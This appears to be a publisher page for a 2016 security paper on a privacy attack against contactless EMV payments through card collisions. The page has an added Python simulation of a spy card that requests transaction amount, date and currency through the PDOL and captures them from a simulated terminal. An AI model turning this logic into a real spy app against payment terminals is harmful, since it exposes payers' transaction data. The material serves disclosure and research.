
2016 | OriginalPaper | Chapter

NFC Payment Spy: A Privacy Attack on Contactless Payments

Authors : Maryam Mehrnezhad, Mohammed Aamir Ali, Feng Hao, Aad van Moorsel

Published in: Security Standardisation Research

Publisher: Springer International Publishing


Abstract

In a contactless transaction, when more than one card is presented to the payment terminal's field, the terminal does not know which card to choose to proceed with the transaction. This situation is called a card collision. EMV (the primary standard for smart card payments) specifies that the reader should not proceed when it detects a card collision and should instead notify the payer. In comparison, the ISO/IEC 14443 standard specifies that the reader should choose one card by comparing the UIDs of the cards detected in the field. However, our observations show that the implementation of contactless readers in practice follows neither EMV's card collision algorithm nor the card collision procedure specified in ISO.
Due to this inconsistency between the implementation and the standards, we show an attack that may compromise the user's privacy by collecting the user's payment details. We design and implement a malicious app simulating an NFC card, which the user needs to install on her phone. When she aims to pay contactlessly while placing her card close to her phone, this app engages with the terminal before the card does. The experiments show that even when the terminal detects a card collision (the app essentially acts like a second card), it proceeds with the EMV protocol. We show that the app can retrieve from the terminal the transaction data, which include information about the payment such as the amount and date. The experimental results show that our app can effectively spy on contactless payment transactions, winning the race caused by card collisions around 66 % of the time when tested with different cards. By presenting these attacks we raise awareness of privacy and security issues in the specifications, standardisation and implementations of contactless cards and readers.
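The abstract says the app, once it wins the collision race, receives the transaction amount and date from the terminal. In EMV contactless the standard channel for that is the PDOL: the card lists the terminal data it wants (tag 9F38) in its SELECT response, and the terminal sends those values back inside GET PROCESSING OPTIONS (tag 83). The simulation below is an added example written for this page, not the authors' app or any project's code; it assumes the spy app uses exactly that PDOL mechanism (the abstract does not say how the data is retrieved), uses the public Visa AID A0000000031010 only so the terminal's SELECT matches, models nothing of the RF-level collision race, and uses a constructed transaction (12.50 GBP on 2016-09-01).

```python
"""Added example: an HCE-style 'spy card' that asks for transaction data via the PDOL,
and a minimal EMV contactless terminal that hands it over in GPO. Not the paper's code."""

OK = b"\x90\x00"
PPSE = b"2PAY.SYS.DDF01"
AID = bytes.fromhex("A0000000031010")   # public Visa AID: only so the terminal's SELECT matches
# PDOL advertised by the spy: every entry is a terminal-supplied transaction value
PDOL = bytes.fromhex("9F0206" "9F0306" "9F1A02" "5F2A02" "9A03" "9C01" "9F3704")


def tlv(tag: str, value: bytes) -> bytes:
    """Encode one BER-TLV object (short-form length is enough for these messages)."""
    assert len(value) < 0x80
    return bytes.fromhex(tag) + bytes([len(value)]) + value


def _read_tag(data: bytes, i: int):
    t = data[i:i + 2] if data[i] & 0x1F == 0x1F else data[i:i + 1]   # 2-byte tags such as 9F02
    return t.hex().upper(), i + len(t)


def parse_tlvs(data: bytes) -> dict:
    """Parse a flat run of BER-TLV objects into {tag: value}; nest by calling again on a value."""
    out, i = {}, 0
    while i < len(data):
        tag, i = _read_tag(data, i)
        ln = data[i]
        out[tag] = data[i + 1:i + 1 + ln]
        i += 1 + ln
    return out


def parse_dol(dol: bytes) -> list:
    """A DOL is a list of (tag, length) pairs without values."""
    out, i = [], 0
    while i < len(dol):
        tag, i = _read_tag(dol, i)
        out.append((tag, dol[i]))
        i += 1
    return out


class SpyCard:
    """Answers SELECT like a card, then records what the terminal puts in GPO."""

    def __init__(self):
        self.captured = {}

    def process_apdu(self, apdu: bytes) -> bytes:
        cla, ins, p1, _p2, lc = apdu[:5]
        data = apdu[5:5 + lc]
        if ins == 0xA4 and p1 == 0x04 and data == PPSE:      # SELECT PPSE: list our AID
            entry = tlv("61", tlv("4F", AID) + tlv("87", b"\x01"))
            return tlv("6F", tlv("84", PPSE) + tlv("A5", tlv("BF0C", entry))) + OK
        if ins == 0xA4 and p1 == 0x04 and data == AID:       # SELECT AID: FCI carrying the PDOL
            return tlv("6F", tlv("84", AID) + tlv("A5", tlv("9F38", PDOL))) + OK
        if cla == 0x80 and ins == 0xA8:                       # GPO: tag 83 holds PDOL values in order
            values, i = parse_tlvs(data)["83"], 0
            for tag, ln in parse_dol(PDOL):
                self.captured[tag] = values[i:i + ln]
                i += ln
            return b"\x69\x85"   # data is already captured; let the terminal decline
        return b"\x6D\x00"       # INS not supported

    def summary(self) -> dict:
        amt, d = self.captured.get("9F02", b""), self.captured.get("9A", b"").hex()
        return {"amount_cents": int(amt.hex()) if amt else None,          # n12 BCD
                "date": f"20{d[0:2]}-{d[2:4]}-{d[4:6]}" if d else None,   # YYMMDD
                "currency": self.captured.get("5F2A", b"").hex().upper()}


def run_terminal(card, amount_cents: int, date_yymmdd: str, currency="0826", country="0826") -> bytes:
    """Minimal terminal: SELECT PPSE, SELECT first AID, GPO filled from the card's PDOL."""
    def select(name):
        return bytes([0x00, 0xA4, 0x04, 0x00, len(name)]) + name + b"\x00"
    resp = card.process_apdu(select(PPSE))
    a5 = parse_tlvs(parse_tlvs(resp[:-2])["6F"])["A5"]
    aid = parse_tlvs(parse_tlvs(parse_tlvs(a5)["BF0C"])["61"])["4F"]
    resp = card.process_apdu(select(aid))
    a5 = parse_tlvs(parse_tlvs(resp[:-2])["6F"])["A5"]
    pdol = parse_tlvs(a5).get("9F38", b"")
    terminal_data = {                                   # constructed transaction values
        "9F02": bytes.fromhex(f"{amount_cents:012d}"),  # Amount, Authorised
        "9F03": bytes(6),                               # Amount, Other
        "9F1A": bytes.fromhex(country),                 # Terminal Country Code
        "5F2A": bytes.fromhex(currency),                # Transaction Currency Code
        "9A": bytes.fromhex(date_yymmdd),               # Transaction Date
        "9C": b"\x00",                                  # Transaction Type: purchase
        "9F37": bytes.fromhex("1A2B3C4D"),              # Unpredictable Number (fixed here)
    }
    body = b"".join(terminal_data.get(tag, bytes(ln))[:ln] for tag, ln in parse_dol(pdol))
    gpo = bytes([0x80, 0xA8, 0x00, 0x00, len(body) + 2]) + tlv("83", body) + b"\x00"
    return card.process_apdu(gpo)


def demo():
    spy = SpyCard()
    sw = run_terminal(spy, amount_cents=1250, date_yymmdd="160901")
    return spy.summary(), sw


if __name__ == "__main__":
    print(demo())
```

The point the simulation makes is that nothing in the exchange up to GPO authenticates the card: the terminal ships amount, currency, date and country to whatever answered SELECT, so an app that wins the race at the ISO/IEC 14443 layer learns those values before any cryptogram is requested. Which side wins that race is what the paper measures experimentally and is not modelled here.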


Footnotes

3. For the rest of this paper, unless noted otherwise, by ISO standard we mean ISO/IEC 14443, and by EMV standard we mean the EMV Contactless Specifications.

4. In the rest of this paper, unless noted otherwise, by bank card we mean contactless payment card.
Metadata

Title: NFC Payment Spy: A Privacy Attack on Contactless Payments
Authors: Maryam Mehrnezhad, Mohammed Aamir Ali, Feng Hao, Aad van Moorsel
Copyright Year: 2016
DOI: https://doi.org/10.1007/978-3-319-49100-4_4
